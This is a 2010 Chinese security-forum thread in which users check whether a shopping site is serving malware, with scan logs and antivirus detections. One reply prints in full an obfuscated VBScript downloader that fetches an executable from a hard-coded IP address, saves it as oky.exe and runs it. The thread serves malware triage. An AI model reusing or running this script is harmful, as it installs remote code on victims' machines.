收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 帮忙看一下,这个网站是否被挂马了~[正常][已检测 by 是 ...
返回列表 发新帖
查看: 1545|回复: 6
收起左侧

[已鉴定] 帮忙看一下,这个网站是否被挂马了~[正常][已检测 by 是昔流芳]

[复制链接]
llj4862
发表于 2010-11-17 10:52:58 | 显示全部楼层 |阅读模式
本帖最后由 是昔流芳 于 2010-11-17 13:23 编辑

www.dianxiao3.com

我这EAV4.0有报。




gx[1].rar

54.02 KB, 下载次数: 133
回复

举报

猪头大队
头像被屏蔽
发表于 2010-11-17 10:56:09 | 显示全部楼层
枫树正常打开
回复

举报

llj4862
 楼主| 发表于 2010-11-17 10:56:56 | 显示全部楼层
那奇怪了。这个JPG是从哪来的?
回复

举报

llj4862
 楼主| 发表于 2010-11-17 10:59:09 | 显示全部楼层
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(49)+Chr(50)+Chr(50)+Chr(46)+Chr(49)+Chr(49)+Chr(53)+Chr(46)+Chr(54)+Chr(51)+Chr(46)+Chr(55)+Chr(48)+Chr(58)+Chr(50)+Chr(56)+Chr(48)+Chr(47)+Chr(115)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
on error resume next
回复

举报

ppy0606
发表于 2010-11-17 11:01:22 | 显示全部楼层
Log generated by 9eyes use mdecoder 0.67
[root]http://www.dianxiao3.com/(鍏ㄥ浗澶у?鐢熺綉缁滆秴甯?- Powered by ECShop)
    [script]http://www.dianxiao3.com/js/common.js
    [script]http://www.dianxiao3.com/js/index.js
    [script]http://www.dianxiao3.com/js/transport.js
    [script]http://www.dianxiao3.com/js/utils.js
    [script]http://www.dianxiao3.com/data/flashdata/default/cycle_image.js
        [flash]http://www.dianxiao3.com/data/flashdata/default/data/flashdata/default/bcastr.swf?bcastr_xml_url=data/flashdata/default/data.xml


FF 木反应
回复

举报

留侯
发表于 2010-11-17 12:20:52 | 显示全部楼层
大蜘蛛,chrome7.0.517.44/IE8没有报告。
gx[1]\gx[1].jpg - infected with BackDoor.Generic.1270
回复

举报

天使的愤怒
发表于 2010-11-17 12:25:34 | 显示全部楼层
回复 1楼 llj4862 的帖子

2010-11-17 12:23:58        HTTP 过滤器        文件        http://bbs.kafan.cn/forum-attach ... Q5fDI5NjM2OA==.html        Win32/VB.NTI 特洛伊木马 的变种        连接中断 - 已隔离        PC-201011161301\Administrator        通过应用程序访问 web 时检测到威胁: C:\Program Files\Internet Explorer\IEXPLORE.EXE.
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-19 16:21 , Processed in 0.134345 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表